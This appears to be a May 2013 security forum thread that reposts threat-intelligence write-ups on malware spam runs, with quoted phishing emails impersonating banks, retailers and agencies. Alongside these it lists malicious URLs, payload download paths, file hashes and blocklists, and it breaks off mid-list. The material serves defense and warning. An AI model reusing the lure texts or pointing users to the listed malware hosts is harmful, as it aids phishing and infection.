Attached (DOC|WORD file|document|file) is your Bank of America Paymentech electronic Merchant Billing Statement.
If you need assistance, please (contact|message|call) your Account Executive or call Merchant Services at the telephone number listed on your statement.
PLEASE DO NOT RESPOND BY USING REPLY. This (email|mail) is sent from an unmonitored email address, and your response will not be received by Bank of America Paymentech.
Bank of America Paymentech will not be responsible for any liabilities that may result from or relate to any failure or delay caused by Bank of America Paymentech’s or the Merchant’s email service or otherwise. Bank of America Paymentech recommends that Merchants continue to monitor their statement information regularly.
Spam contains malicious attachment.
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/e97f4b74fb8abec483dfd265ee12678f/tumblr_inline_mmqx7bdxu51qz4rgp.png
___
Malicious Citibank Secure Message Spam
- http://threattrack.tumblr.com/post/50357500910/malicious-citibank-secure-message-spam
13 May 2013 - "Subjects Seen:
You have received a secure message
Typical e-mail details:
Read your secure message by opening the attachment, securedoc.html You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it with Internet Explorer.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Citi Secure Email Help Desk at (866) 535-2504.
First time users - will need to register after opening the attachment.
About Email Encryption - citi .com/citi/citizen/privacy/email.htm
Malicious URLs
mail.yaklasim .com:8080/forum/viewtopic.php
116.122.158.195 :8080/forum/viewtopic.php
vulcantire .net/forum/viewtopic.php
westautorepair .com/forum/viewtopic.php
metroimport-tires .com/forum/viewtopic.php
iis1.ontera .net/AUWY5Z.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/a56d101a2242f408aec441042ef617f2/tumblr_inline_mmr3owXmUI1qz4rgp.png
___
Fake AMEX SPAM / SecureMail.zip
- http://blog.dynamoo.com/2013/05/confidential-secure-message-from-amex.html
13 May 2013 - "This fake Amex email has a malicious attachment:
Date: Tue, 14 May 2013 01:34:36 +0600 [15:34:36 EDT]
From: American Express [Jarvis_Randall @aexp .com]
Subject: Confidential - Secure Message from AMEX
Secure Message
The security of your personal information is of the utmost importance to American Express, so we have sent the attached as a secure electronic file.
Note: The attached file contains encrypted data.
If you have any questions, please call us at 800-748-8515, option 0. Representatives are available to assist you Monday through Thursday between 8:00 a.m. and 8:00 p.m. ET and Friday between 8:00 a.m. and 6:00 p.m. ET.
The information contained in this message may be privileged, confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited.
Thank you,
American Express
2012 American Express Company. All rights reserved.
There is an attachment SecureMail.zip which in turn contains an executable file SecureMail .exe which has an icon designed to look like a PDF file. VirusTotal results for the malware are just 15/46*. Comodo CAMAS reports the following characteristics and also a connection to a known malware C&C server mail.yaklasim .com on 212.58.4.13 (DorukNet, Turkey).
Size 137216
MD5 20de8bad8bf8279e4084e9db461bd140
SHA1 caacc00d68f41dad9b1abb02f9e243911f897852
SHA256 18e2fc0b9386cadc31fb15cb38d9fa5d274f42b8127b349a14c962329b691ee7
The ThreatTrack report*** also shows a connection to 212.58.4.13 as well as 62.233.104.156 (IOMART, UK) and several other IPs that may form part of a botnet. Blocking EXE-in-ZIP files at the perimeter is a good move if you can do it.
Blocklist:
mail.yaklasim .com
212.58.4.13
62.233.104.156 ..."
* https://www.virustotal.com/en/file/18e2fc0b9386cadc31fb15cb38d9fa5d274f42b8127b349a14c962329b691ee7/analysis/1368476716/
File name: SecureMail.exe
Detection ratio: 15/46
Analysis date: 2013-05-13
** http://camas.comodo.com/cgi-bin/submit?file=18e2fc0b9386cadc31fb15cb38d9fa5d274f42b8127b349a14c962329b691ee7
*** http://www.dynamoo.com/files/analysis_30572_20de8bad8bf8279e4084e9db461bd140.pdf
:fear::fear: :mad:
AplusWebMaster
2013-05-14, 15:50
FYI...
Fake BoA SPAM / RECEIPT428-586.doc
- http://blog.dynamoo.com/2013/05/bank-of-america-spam.html
14 May 2013 - "This fake Bank of America message has a malicious Word document attached:
Date: Tue, 14 May 2013 10:16:05 +0500 [01:16:05 EDT]
Subject: Your transaction is completed
Transaction is completed. $51317477 has been successfully transferred.
If the transaction was made by mistake please contact our customer service.
Receipt of payment is attached.
*** This is an automatically generated email, please do not reply ***
Bank of America, N.A. Member FDIC. Equal Housing Lender Opens in new window
© 2013 Bank of America Corporation. All rights reserved
The attached document is RECEIPT428-586.doc which contains a CVE-2012-0158 / MS12-027 exploit, so a fully patched Windows system should be immune. Further analysis is pending, but the payload is likely to be P2P / Gameover Zeus as found in this attack*. VirusTotal detections stand at just 11/46**. Further analysis is pending."
* http://blog.dynamoo.com/2013/05/citibank-spam-statement-id-64775-4985doc.html
** https://www.virustotal.com/en/file/a13ec5a6e7762b60882227640b57a32acd711fb6c706eabd1b9613e937e3e356/analysis/
File name: RECEIPT428-586.doc
Detection ratio: 18/43
Analysis date: 2013-05-14
___
Something evil on 94.242.198.16
- http://blog.dynamoo.com/2013/05/something-evil-on-9424219816.html
14 May 2013 - "I'm not entirely sure what this is, I think it's an injection attack leading to a malware server on 94.242.198.16 (Root SA, Luxemburg) which is using various stealth techniques to avoid detection. This is what I'm seeing.. code is getting injected into sites referring to [donotclick]fryzjer .me/hpoxqnj.php (report*) or [donotclick]stempelxpress .nl/vechoix.php (report**) which (if called in the correct way) tries to forward the victim to
[donotclick]ice.zoloni-kemis .info/lyxtp?ftqvixid=94764 or [donotclick]ice.zoloni-kemis .info/lifym?ftypyok=947645 hosted on 94.242.198.16.
VirusTotal reports this as a bad IP***, and out of several domains associated with this IP, almost all are red-flagged by Google for malware. The site contains several subdomains of the following domains.. I would recommend the following blocklist:
94.242.198.16
integrate-koleiko .com
integrate-koleiko .org
integrate-koleiko .net
muroi-uroi-loi .info
muroi-uroi-loi .org
muroi-uroi-loi .net
zoloni-kemis .info ..."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=2455754
** http://urlquery.net/report.php?id=2455905
*** https://www.virustotal.com/en/ip-address/94.242.198.16/information/
- https://www.google.com/safebrowsing/diagnostic?site=AS:5577
"... over the past 90 days, 50 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-05-14, and the last time suspicious content was found was on 2013-05-14... Over the past 90 days, we found 30 site(s) on this network... that appeared to function as intermediaries for the infection of 131 other site(s)... We found 282 site(s)... that infected 4631 other site(s)..."
___
Malicious Dun and Bradstreet Compliant Spam
- http://threattrack.tumblr.com/post/50425045511/malicious-dun-and-bradstreet-compliant-spam
14 May 2013 - "Subjects Seen:
FW : Complaint - [removed]
Typical e-mail details:
Dun & Bradstreet has received the above-referenced complaint from one of your customers regarding their dealings with you. The details of the consumer’s concern are included on the reverse. Please review this matter and advise us of your position.
In the interest of time and good customer relations, please provide the DnB with written verification of your position in this matter by May 18, 2013. Your prompt response will allow DnB to be of service to you and your customer in reaching a mutually agreeable resolution. Please inform us if you have contacted your customer directly and already resolved this matter.
The Dun & Bradstreet develops and maintains Reliability Reports on companies across the United States and Canada . This information is available to the public and is frequently used by potential customers. Your cooperation in responding to this complaint becomes a permanent part of your file with the Better Business Bureau. Failure to promptly give attention to this matter may be reflected in the report we give to consumers about your company.
We encourage you to print this complaint (attached file), answer the questions and respond to us.
We look forward to your prompt attention to this matter.
Malicious URLs
mail.yaklasim .com:8080/forum/viewtopic.php
116.122.158.195 :8080/forum/viewtopic.php
hurricanestormsavings .com/ponyb/gate.php
hurricanestrengthsavings .com/ponyb/gate.php
62.233.104.156 /tHjefFt.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/bd23b23e8cedc32ce98c9e6b66835591/tumblr_inline_mmspwolB071qz4rgp.png
:fear: :mad:
AplusWebMaster
2013-05-15, 13:58
FYI...
Fake ‘Free Media Player’ via rogue ‘Adobe Flash Player HD’ ad ...
- http://blog.webroot.com/2013/05/15/fake-free-media-player-distributed-via-rogue-adobe-flash-player-hd-advertisement/
May 15, 2013 - "Our sensors just picked up a rogue advertisement served through the Yieldmanager ad network, which exposes users to fake Adobe Flash Player HD ads, ultimately dropping a copy of the potentially unwanted application (PUA)/adware, known as Somoto Better Installer...
Sample screenshot of the actual advertisement:
> https://webrootblog.files.wordpress.com/2013/05/fake_flash_player_hd_02_adware_somoto.png?w=869
... once users click, they’re presented with a rogue Free Media Player page, instead of of a Adobe Flash Player HD themed page. Users who fall victim to the social engineering scam will end up installing multiple potentially unwanted applications... Landing domain:
hxxp ://www.softigloo .com – 78.138.105.151. Responding to the same IP is also the following typosquatted domain – hxxp ://down1oads .com...
Detection rate for the sampled malware:
MD5: 3ee49800cc3c2ce74fa63e6174c81dff * ... Somoto BetterInstaller; Adware.Somoto
MD5: b57cc4b5aecd69eb57063f4de914d4dd ** ... Somoto BetterInstaller; TROJ_GEN.F47V0429 ...
And initiates the following TCP connections:
78.138.97.8 :80
54.239.158.55 :80
78.138.127.129 :80
54.239.158.183 :80
54.239.158.247 :80
78.138.127.7 :80
The affiliate network participant that’s abusing the Yieldmanager ad network is currently earning revenue through the Somoto’s BetterInstaller PPI (Pay-Per-Install) revenue sharing network..."
(More detail at the websense URL above.)
* https://www.virustotal.com/en/file/826b5b15c89eb70d8459bb26a4faefdf505e3baae76bb6dd49289aa96d72217a/analysis/1368314633/
File name: VLCMediaPlayerSetup-9Kf76Wv.exe
Detection ratio: 8/46
Analysis date: 2013-05-11
** https://www.virustotal.com/en/file/2e0d7b543e5471f9bff7ec7f9121658d0e8fd588238f7c0b98c9e863061fc0ba/analysis/1368314918/
File name: 7ZipSetup-aVEkw5Y.exe
Detection ratio: 8/46
Analysis date: 2013-05-11
Removal Guide for Somoto.BetterInstaller
> http://forums.spybot.info/showthread.php?68498-Manual-Removal-Guide-for-Somoto-BetterInstaller&highlight=Somoto%92s+BetterInstaller
2013-05-08
___
Malicious FedEx SPAM delivers trojan ...
- http://www.hotforsecurity.com/blog/spam-posing-as-fedex-e-mail-delivers-gamarue-trojans-instead-of-packages-6173.html
May 15, 2013 - "A new wave of malicious FedEx spam delivers Trojans instead of packages, infecting users with malware when opening the attachments. In the last couple months, the Gamarue Trojan has spread intensely in the US, Australia, Croatia, Romania, Iran, the UK, Germany and Spain...
Screenshot1: http://www.hotforsecurity.com/wp-content/uploads/2013/05/spam-posing-as-fedex-e-mail-delivers-gamarue-trojans-instead-of-packages-1.jpg
... To give credibility to the malicious payload, scammers added links to the authentic shipping company. Trojan.Gamarue silently installs itself on the system, sending sensitive information to the command and control center. The stolen data can then be used for identity theft and other cyber-criminal activities. Gamarue can also download and execute arbitrary files, performing updates without users noticing. The malicious software can also spread to removable drives, so users should be careful when managing important documents through USB devices...
Screenshot2: http://www.hotforsecurity.com/wp-content/uploads/2013/05/spam-posing-as-fedex-e-mail-delivers-gamarue-trojans-instead-of-packages-2.png
FedEx is a common target for cyber-criminals, who only change the bait from time to time. Other excuses to ship malware include parcel delivery notifications. Scammers also request money in return for delivery of a package by posing as representatives of the shipping service. They also go so far as to create spoofed web sites to collect usernames, passwords, Social Security Numbers, credit card details and more..."
___
Fake Facebook SPAM / otophone .net
- http://blog.dynamoo.com/2013/05/facebook-spam-otophonenet.html
15 May 2013 - "This fake Facebook spam leads to malware on otophone .net:
Date: Tue, 14 May 2013 15:29:24 -0500 [05/14/13 16:29:24 EDT]
From: Facebook [notification+LTFS15RDTR @facebookmail .com]
Subject: Jonathan Rogers wants to be friends on Facebook
facebook
Jonathan Rogers wants to be friends with you on Facebook Facebook...
1083 friends · 497 photos · 2 notes · 1535 Wall posts
Confirm Friend Request
See All Requests
This message was sent to dynamoo @spamcop .net. If you don't want to receive these emails from Facebook in the future, please click: unsubscribe.
Facebook, Inc. Attention: Department 417 P.O Box 10005 Palo Alto CA 96303
The link in the email goes through a legitimate hacked site and then ends up on a malware landing page at [donotclick]otophone .net/news/appreciate_trick_hanging.php (report here*) hosted on the following IPs:
36.224.16.74 (Chunghwa Telecom, Taiwan)
108.5.125.134 (Verizon, US)
198.61.147.58 (Matt Martin Real Estate Management / Rackspace, US)...
Blocklist:
36.224.16.74
108.5.125.134
198.61.147.58 ..."
* http://urlquery.net/report.php?id=2474662
___
Something evil on 184.95.51.123
- http://blog.dynamoo.com/2013/05/something-evil-on-1849551123.html
15 May 2013 - "184.95.51.123 (Secured Servers LLC, US) appears to be trying to serve the Blackhole Exploit kit through an injection attack (for example). The payload appears to be 404ing when viewed in the automated tools I am using, but indications are that the malware on this site is still very much live. The domains on this server belong to a legitimate company, Lifestyle exterior Products, Inc. of Florida who are probably completely unaware of the issue.
These following domains are all flagged by Google as being malicious, and are all based on 184.95.51.123. I would recommend blocking the IP if you can..."
___
Malicious DocuSign Payroll Spam
- http://threattrack.tumblr.com/post/50498753152/malicious-docusign-payroll-spam
15 May 2013 - "Subjects Seen:
Completed: Please DocuSign this document : Payroll May 2013..pdf
Typical e-mail details:
Your document has been completed
Sent on behalf of [removed].
All parties have completed the envelope ‘Please DocuSign this document: Payroll April 2013..pdf’.
To view or print the document download the attachment .
(self-extracting archive, Adobe PDF)
This document contains information confidential and proprietary to [removed]
Malicious URLs
mail.yaklasim .com:8080/forum/viewtopic.php
116.122.158.195 :8080/forum/viewtopic.php
lifestylehomeowners .com/ponyb/gate.php
lifestylehurricaneguide .com/ponyb/gate.php
parpaiol a.com/0nWhFjZ.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/bbec0d266108d30e96b107c7f707e11f/tumblr_inline_mmuhuxrAIV1qz4rgp.png
___
Fake ADP SPAM / outlookexpres .net
- http://blog.dynamoo.com/2013/05/adp-spam-outlookexpresnet.html
15 May 2013 - "This fake ADP spam leads to malware on outlookexpres .net:
Date: Wed, 15 May 2013 22:39:26 +0400
From: "donotreply @adp .com" [phrasingr6 @news.adpmail .org]
Subject: adp_subj
ADP Instant Warning
Report #: 55233
Respected ADP Client May, 15 2013
Your Processed Transaction Report(s) have been uploaded to the website:
Sign In here
Please see the following information:
• Please note that your bank account will be charged within 1 business banking day for the sum shown on the Statement(s).
• Please don't try to reply to this message. automative notification system not configured to accept incoming email. Please Contact your ADP Benefits Expert.
This email was sent to existing users in your company that access ADP Netsecure.
As every time, thank you for using ADP as your business affiliate!
Rep: 55233 [redacted]
The link in the spam email goes through a legitimate but hacked site and ends up on a malware landing page at [donotclick]outlookexpres .net/news/estimate_promising.php (report here*) hosted on the same IPs found in this attack:
36.224.16.74 (Chunghwa Telecom, Taiwan)
108.5.125.134 (Verizon, US)
198.61.147.58 (Matt Martin Real Estate Management / Rackspace, US)
Blocklist:
36.224.16.74
108.5.125.134
198.61.147.58 ..."
* http://urlquery.net/report.php?id=2479638
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Scanned Document Attachment E-mail Messages - 2013 May 15
Fake Product Order E-mail Messages - 2013 May 15
Fake Document Sharing Notification E-mail Messages - 2013 May 15
Fake Invoice Statement Attachment E-mail Messages - 2013 May 15
Malicious Attachment E-mail Messages - 2013 May 15
Fake Delta E-Ticket Attachment E-mail Messages - 2013 May 15
Fake Third Party Consumer Complaint Notification E-mail Messages - 2013 May 15
Fake Portuguese Invoice Notification E-mail Messages - 2013 May 15
Fake Photo Sharing E-mail Messages - 2013 May 15
Fake Product Order Request E-mail Messages - 2013 May 15
Fake Xerox Scan Attachment E-mail Messages - 2013 May 15
Malicious Attachment E-mail Messages - 2013 May 15
(More info and links at the cisco URL above.)
:fear::mad:
AplusWebMaster
2013-05-16, 16:57
FYI...
Fake "Invoice Copy" SPAM / invoice copy.zip
- http://blog.dynamoo.com/2013/05/invoice-copy-spam-invoice-copyzip.html
16 May 2013 - This fake invoice email contains a malicious attachment:
Date: Thu, 16 May 2013 00:27:41 -0500 [01:27:41 EDT]
From: Karen Parker [Kk.parker @tiffany .com]
Subject: invoice copy
Kindly open to see export License and payment invoice attached,meanwhile we sent the balance payment yesterday.Please confirm if it has settled in your account or you can call ifthere is any problem.ThanksKaren parker
The attachment is invoice copy.zip which in turn contains an executable invoice copy.exe which has an icon to make it look like a spreadsheet. VirusTotal results are a pretty poor 7/45* and indicate that this is a Zbot variant. The Comodo CAMAS report** indicates that the malware seems to be rummaging though address books and gives the following characteristics:
Size 331776
MD5 ebdcd7b8468f28932f235dc7e0cd8bcd
SHA1 a3d251b8f488ef1602e7016cb1f51ffe116d7917
SHA256 4b15971cf928a42d44afdf87a517d229e4aabbb5967cb9230a19592d2b939fe6
... The ThreatTrack report*** is nicely detailed and gives some details about network connections... As ever, blocking EXE-in-ZIP files at the perimeter is the best way to guard against this type of threat."
* https://www.virustotal.com/en/file/4b15971cf928a42d44afdf87a517d229e4aabbb5967cb9230a19592d2b939fe6/analysis/1368687945/
File name: invoice copy.exe
Detection ratio: 7/45
Analysis date: 2013-05-16
** http://camas.comodo.com/cgi-bin/submit?file=4b15971cf928a42d44afdf87a517d229e4aabbb5967cb9230a19592d2b939fe6
*** http://www.dynamoo.com/files/analysis_30635_ebdcd7b8468f28932f235dc7e0cd8bcd.pdf
___
Fake HMRC SPAM / VAT Returns Repot 517794350.doc
- http://blog.dynamoo.com/2013/05/hmrc-spam-vat-returns-repot-517794350doc.html
16 May 2013 - "This fake HMRC (UK tax authority) spam contains a malicious attachment:
From: noreply @hmrc .gov.uk [mailto:noreply @hmrc .gov.uk]
Sent: 16 May 2013 10:48
Subject: Successful Receipt of Online Submission for Reference 517794350
Thank you for sending your VAT Return online. The submission for reference 517794350 was successfully received on 2013-05-16 T10:45:27 and is being processed. Make VAT Returns is just one of the many online services we offer that can save you time and paperwork.
For the latest information on your VAT Return please open attached report.
The original of this email was scanned for viruses by the Government Secure Intranet virus scanning service supplied by Cable&Wireless Worldwide in partnership with MessageLabs. (CCTM Certificate Number 2009/09/0052.) On leaving the GSi this email was certified virus free.
Communications via the GSi may be automatically logged, monitored and/or recorded for legal purposes.
The attachment is VAT Returns Repot 517794350.doc which contains an exploit which is currently being analysed. It is likely to use the same vulnerability as this attack*. VirusTotal results are just 1/46**, so either this is something completely new or it is a corrupt sample. UPDATE: ThreatTrack reports*** that the malware sample appears to make contact with the following IPs which are all dynamic IP addresses, indicating perhaps a P2P version of Zeus:
62.103.27.242
76.245.44.216
86.124.111.218
92.241.139.165
122.179.128.38
189.223.139.172
190.42.161.35 ..."
* http://blog.dynamoo.com/2013/05/bank-of-america-spam.html
** https://www.virustotal.com/en/file/c6bdbe23857c0ca054d9fbc07f53ee0187b5ab6e86fea66091171e5b4268cb25/analysis/1368697862/
File name: VAT Returns Repot 517794350.doc
Detection ratio: 1/46
Analysis date: 2013-05-16
*** http://www.dynamoo.com/files/analysis_30639_f49ba87bdcbb24ecf22f9b5b3a8c2a34.pdf
___
Fake Walmart SPAM / bestunallowable .com
- http://blog.dynamoo.com/2013/05/walmartcom-spam-bestunallowablecom.html
16 May 2013 - "This fake Walmart spam leads to malware on bestunallowable .com:
From: Wallmart.com [deviledm978 @news.wallmart .com]
Date: 16 May 2013 14:02
Subject: Thanks for your Walmart.com Order 3795695-976140
Walmart
Visit Walmartcom | Help | My Account | Track My Orders
[redacted]
Thanks for ordering from Walmart.com. We're currently processing your order.
Items in your order selected for shipping
• You'll receive another email, with tracking information, when your order ships.
• If you're paying by credit card or Bill Me Later®, your account will not be charged until your order ships. If you see a pending charge on your account prior to your items shipping, this is an authorization hold to ensure the funds are available. All other forms of payment are charged at the time the order is placed.
Shipping Information
Ship to Home
Hannah Johnson
1961 12 Rd
Orange, NC 68025-3157
USA
---
Walmart.com Order Number: 3795695-976140
Ship to Home - Standard
Items Qty Arrival Date Price
Philips UN65EH9060 50" 1080p 60Hz Class LED (Internet Connected) 3D HDTV 1 Arrives by Tue., May 21
Eligible for Free Standard Shipping to Home. $898.00
Subtotal: $898.00
Shipping: Free
Tax: $62.86
See our Returns Policy or
contact Customer Service Walmart.com Total: $960.86
Order Summary
Order Date: 05/15/2013
Subtotal: $898.00
Shipping: Free
Tax: $62.86
Order Total: $960.86
Credit card: $960.86
Billing Information
Payment Method:
Credit card
If you have any questions, please refer to help.walmart.com or reply to this email and let us know how we can help.
Thanks,
Your Walmart.com Customer Service Team...
Rollbacks Sign Up for Email Savings and Updates
Have the latest Rollbacks, hot new releases, great gift ideas and more sent right to your inbox!
©Walmart.com USA, LLC, All Rights Reserved.
The link goes through a legitimate hacked site and ends up on a malware page at [donotclick]bestunallowable .com/news/ask-index.php (report here*) hosted on:
108.5.125.134 (Verizon, US)
198.61.147.58 (Matt Martin Real Estate Management / Rackspace, US)
The WHOIS details are characterstic of the Amerika gang...
Blocklist (including nameservers):
71.107.107.11
108.5.125.134
198.50.169.2
198.61.147.58
bestunallowable.com ..."
* http://urlquery.net/report.php?id=2494957
___
More Walmart SPAM / virgin-altantic .net
- http://blog.dynamoo.com/2013/05/walmartcom-spam-virgin-altanticnet.html
16 May 2013 - "Another -variant- of this spam* is doing the rounds, this time leading to a landing page on virgin-altantic .net:
From: Wallmart.com [mailto:sculptsu @complains .wallmartmail .com]
Sent: 16 May 2013 15:35
Subject: Thanks for your Walmart.com Order 3450995-348882 ...
---
Subtotal: $898.00
Shipping: Free
Tax: $62.86
See our Returns Policy or
contact Customer Service
Walmart.com Total: $960.86
Order Summary
Order Date: 05/15/2013
Subtotal: $898.00
Shipping: Free
Tax: $62.86
Order Total: $960.86
Credit card: $960.86
Billing Information
Payment Method:
Credit card
If you have any questions, please refer to help.walmart.com or reply to this email and let us know how we can help.
Thanks,
Your Walmart.com Customer Service Team...
The malicious payload is at [donotclick]virgin-altantic .net/news/ask-index.php (report here**). IP addresses are the same as in the other attack, although obviously if you are blocking by domain you should add virgin-altantic .net too."
* http://blog.dynamoo.com/2013/05/walmartcom-spam-bestunallowablecom.html
** http://urlquery.net/report.php?id=2496275
___
Fake Wells Fargo and Citi SPAM / SecureMessage.zip and Securedoc.zip
- http://blog.dynamoo.com/2013/05/wells-fargo-and-citi-spam.html
16 May 2013 - "This fake Wells Fargo message contains a malicious attachment:
Date: Thu, 16 May 2013 23:24:38 +0800 [11:24:38 EDT]
From: "Grover_Covington @wellsfargo .com" [Grover_Covington @wellsfargo .com]
Subject: New Secure Message
Wells Fargo
Help
To Read This Message:
Look for and open SecureMessage.zip (typically at the top or bottom; location varies by email service).
Secure Message
This message was sent to : [redacted]
Email Security Powered by Voltage IBE
Copyright 2013 Wells Fargo. All rights reserved
The attachment SecureMessage.zip contains a file SecureMessage.exe which has a SHA256 of 289bd82b66ed0c66f0e6a947cb61c928275c1053fa5d2b1119828217f61365ba and is only detected by 2/45 scanning engines at VirusTotal**.
The second version is a fake Citi spam with an attachment Securedoc.zip which contains Securedoc.exe. This is the same executable with the same SHA256, just a different name.
Date: Thu, 16 May 2013 10:16:27 -0500 [11:16:27 EDT]
From: "secure.email @citi .com" [secure.email @citi .com]
Subject: You have received a secure message
You have received a secure message
Read your secure message by opening the attachment, securedoc.html You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it with Internet Explorer.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Citi Secure Email Help Desk at (866) 535-2504.
First time users - will need to register after opening the attachment.
About Email Encryption - http ://www.citi .com/citi/citizen/privacy/email.htm
... the best analysis is this ThreatTrack report*... some IPs and domains worth blocking:
69.89.21.99
116.122.158.195
212.58.4.13
mail.yaklasim .com
ryulawgroup .com "
* http://www.dynamoo.com/files/analysis_30642_d5893c62d897d95a30c950cddcbdc604.pdf
** https://www.virustotal.com/en/file/289bd82b66ed0c66f0e6a947cb61c928275c1053fa5d2b1119828217f61365ba/analysis/1368718128/
File name: SecureMessage.exe
Detection ratio: 2/45
Analysis date: 2013-05-16
___
Get Free Followers! on Instagram? Get Free Malware, Survey Scams Instead
- http://blog.trendmicro.com/trendlabs-security-intelligence/get-free-followers-on-instagram-get-free-malware-survey-scams-instead/
May 16, 2013 - "The popular photosharing app Instagram is the latest social networking site targeted by the ubiquitous survey scams seen on Facebook and Twitter. This time, we found that these survey scams may also lead users to download an Android malware... these Instagram followers have repetitive account names like “Tawna Tawna” and “Concetta Concetta”... Given these suspicious signs, I then checked this “Get Free Followers” picture (which is actually clickable) and was led to this page that supposedly offers the “Get Followers” app. This app is detected by Trend Micro as ANDROIDOS_GCMBOT.A, which can be used to launch malicious webpages or send SMS from the device.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/05/instagram-survey-scam-4.jpg
Whether users download the said app or not (in my case, I tried to), in the end they are redirected to your run-of-the-mill survey scams. Since Instagram can also be accessed via a PC, we tried to access the malicious website and survey scam using a desktop. Fortunately, this ruse didn’t work. Cybercriminals profit from these survey scams via ad-tracking sites, which users are redirected to before the actual survey page. Plus, these bad guys can also use the data gathered from these scams by either peddling them to other cybercriminal groups or using them in their future schemes. Facebook, Pinterest, Tumblr, and now Instagram. The people behind these scams are jumping on every popular networking sites and potential engineering hooks like the Google Glass contest. To protect yourself against this scam, you must always double-check posts on your social media accounts, even if they come from friends, family members, or known acquaintance. Caution is your best defense..."
:mad: :mad:
AplusWebMaster
2013-05-17, 14:02
FYI...
e-netprotections .su ?
- https://isc.sans.edu/diary.html?storyid=15818
Last Updated: 2013-05-17 - "Like with .biz, I sometimes have the impression that .su and .cc could be sinkholed in their entirety, because the bad domains seem to vastly outnumber whatever (if any) good is running under these TLDs as well. Earlier today, ISC reader Michael contacted us with information that several PCs on his network had started to communicate with iestats .cc, emstats .su, ehistats .su, e-protections .su and a couple other domains. I was pretty sure that I had seen the latter domain on an earlier occasion in a malware outbreak, but I couldn't find it in our records .. until I only searched for "e-protections", and found e-protections .cc. This domain had been implicated back in October 2012 in a malware spree that was linked to the nasty W32.Caphaw, a backdoor/information stealer... each infected box was apparently running a slightly different version of the EXE. Anti-Virus coverage is still thin (Virustotal*) , but the Heuristics of some products seem to be catching on. This sample looks more like a ransomware trojan than Caphaw, but we'll know more once we analyze all the information gathered so far..."
Partial list of IPs involved:
64.85.161.67
85.25.132.55
173.224.210.244
178.63.172.88
188.95.48.152
199.68.199.178
91.227.220.104
* https://www.virustotal.com/en/file/b19818bb463075327c6be9fd8e913c0d4bf9dff503a991cbbc670cc673db9041/analysis/
File name: dwdsrtrt
Detection ratio: 4/46
Analysis date: 2013-05-16
- https://www.abuse.ch/?p=3581
___
Malicious Wells Fargo Secure Message Spam
- http://threattrack.tumblr.com/post/50597669027/malicious-wells-fargo-secure-message-spam
16 May 2013 - "Subjects Seen:
New Secure Message
Typical e-mail details:
View attachment for details
To Read This Message:
Look for and open SecureMessage.zip (typically at the top or bottom; location varies by email service).
Malicious URLs
mail.yaklasim .com:8080/forum/viewtopic.php
116.122.158.195 :8080/forum/viewtopic.php
mylifestylestormproducts .com/forum/viewtopic.php
mysafefloridahomelife .com/forum/viewtopic.php
ryulawgroup .com/Gsdw1.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/fb3e5e3449eb83ff06490237ae80520d/tumblr_inline_mmwrmi4bl91qz4rgp.png
___
Malicious "Referral link" SPAM / rockingworldds .net and parishiltonnaked2013 .net
- http://blog.dynamoo.com/2013/05/referral-link-spam-rockingworlddsnet.html
17 May 2013 - "This spam comes from a hacked AOL email account and leads to malware on 62.76.190.11:
From: [AOL sender]
Sent: 17 May 2013 14:12
To: [redacted]
Subject: [AOL screen name]
Subject :RE ( 8 )
Sent: 5/17/2013 2:11:53 PM
referral link
http ://printcopy.co .za/elemqi.php?whvbcfm
The link goes through a legitimate -hacked- site and in this case ends up at [donotclick]rockingworldds .net/sword/in.cgi?6 (report here*) which either -redirects- to a weight loss spam site or alternatively a malware landing page at [donotclick]parishiltonnaked2013 .net/ngen/controlling/coupon_voucher.php (report here**) which appears to load the BlackHole Exploit Kit. Both these sites are hosted on 62.76.190.11 (Clodo-Cloud / IT House, Russia)... I have several IPs blocked in the 62.76.184.0/21 range, you may want to consider blocking the entire lot if you don't have any reason to send web traffic to Russia."
* http://urlquery.net/report.php?id=2512341
** http://urlquery.net/report.php?id=2512431
___
Fake Newegg .com SPAM / balckanweb .com
- http://blog.dynamoo.com/2013/05/neweggcom-spam-balckanwebcom.html
17 May 2013 - "This fake Newegg.com spam leads to malware:
Date: Fri, 17 May 2013 10:29:20 -0600 [12:29:20 EDT]
From: Newegg [info @newegg .com]
Subject: Newegg.com - Payment Charged
Priority: High Priority 1
Newegg logo
My Account My Account | Customer Services Customer Services
Twitter Twitter You Tube You Tube Facebook Facebook Myspace Myspace
click to browse e-Blast click to browse Shell Shocker click to browse Daily Deals
Computer Hardware PCs & Laptops Electronics Home Theater Cameras Software Gaming Cell Phones Home & Office MarketPlace Outlet More
Customer ID: [redacted]
Account Number: 23711731
Dear Customer,
Thank you for shopping at Newegg.com.
We are happy to inform you that your order (Sales Order Number: 97850177) has been successfully charged to your AMEX and order verification is now complete.
If you have any questions, please use our LiveChat function or visit our Contact Us Page.
Once You Know, You Newegg.
Your Newegg.com Customer Service Team
ONCE YOU KNOW, YOU NEWEGG. Ž
Policy and Agreement | Privacy Policy | Confidentiality Notice
Newegg.com, 9997 Rose Hills Road, Whittier, CA. 90601-1701 | Š 2000-2013 Newegg Inc. All rights reserved.
Screenshot: https://lh3.ggpht.com/-Si0jHOHqviw/UZZqyHxGvPI/AAAAAAAABOY/5HZq7dloGwE/s1600/newegg.png
In the version I have the link doesn't work, but I believe that it goes to [donotclick]balckanweb .com/news/unpleasant-near_finally-events.php (report here*) hosted or having nameservers on the following IPs:
5.231.24.162 (GHOSTnet, Germany)
71.107.107.11 (Verizon, US)
108.5.125.134 (Verizon, US)
198.50.169.2 (OVH, Canada)
198.61.147.58 (Matt Martin Real Estate Management / Rackspace, US)
209.59.223.119 (Endurance International Group, US)
The domains and IPs indicate that this is part of the "Amerika" spam run.
Blocklist (including nameservers):
5.231.24.162
71.107.107.11
